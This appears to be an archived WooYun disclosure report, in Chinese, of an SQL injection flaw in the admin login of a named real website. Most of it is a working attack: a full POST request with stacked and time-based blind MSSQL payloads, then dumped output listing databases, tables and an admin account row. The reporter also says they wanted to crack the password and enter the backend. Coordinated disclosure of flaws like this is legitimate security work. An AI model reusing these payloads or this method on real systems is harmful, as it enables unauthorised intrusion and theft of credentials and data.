乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-11: 细节已通知厂商并且等待厂商处理中 2015-05-11: 厂商已经确认,细节仅向厂商公开 2015-05-21: 细节向核心白帽子及相关领域专家公开 2015-05-31: 细节向普通白帽子公开 2015-06-10: 细节向实习白帽子公开 2015-06-25: 细节向公众公开
233
http://fx.mgyun.com/main/admin/login.aspx(POST)Button1=&TextBox1=rrNqPVs&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/ES5qw7oTlLMoJSqESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PN%2bDvxnwFeFeJ9MIBWR693zA7sPhuVp7oyUWjddbTxrKvSqmddzonSdJITSPdfViA%3d&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7soAnkm/NxYDeJrd4mcNVYdeEDZxzSA%3d%3d参数textbox1参考payload:rrNqPVs';WAITFOR DELAY '0:0:5'--
---Parameter: TextBox1 (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Button1=&TextBox1=rrNqPVs';WAITFOR DELAY '0:0:5'--&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/ES5qw7oTlLMoJSqESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PN+DvxnwFeFeJ9MIBWR693zA7sPhuVp7oyUWjddbTxrKvSqmddzonSdJITSPdfViA=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7soAnkm/NxYDeJrd4mcNVYdeEDZxzSA== Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: Button1=&TextBox1=rrNqPVs' OR 9245=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'fgsi'='fgsi&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/ES5qw7oTlLMoJSqESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PN+DvxnwFeFeJ9MIBWR693zA7sPhuVp7oyUWjddbTxrKvSqmddzonSdJITSPdfViA=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7soAnkm/NxYDeJrd4mcNVYdeEDZxzSA==---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008available databases [67]:[*] AnalyzeSystem[*] ApkGrabDB[*] AppCoolPoints.............Database: AnalyzeSystem[7 tables]+------------+| Admin || Functions || Group || Manager || MenuConfig || Model || ModelGroup |+------------+从这里拿到管理密码。Table: Admin[1 entry]+---------+---------+--------------------+----------+----------------------------------+| AdminID | GroupID | DateLine | AdminPwd | AdminName |+---------+---------+--------------------+----------+----------------------------------+| 1 | 0 | 09 25 2012 3:43PM | 薍Ꝿꅻٴ塔 | 3f85cffcdcf****a8a3b66cd47f7afed |+---------+---------+--------------------+----------+----------------------------------+可惜还没爆破出来,要不还真想进后台看看!估计里面信息量够大吧!
~~
危害等级:中
漏洞Rank:7
确认时间:2015-05-11 14:21
谢谢反馈。
暂无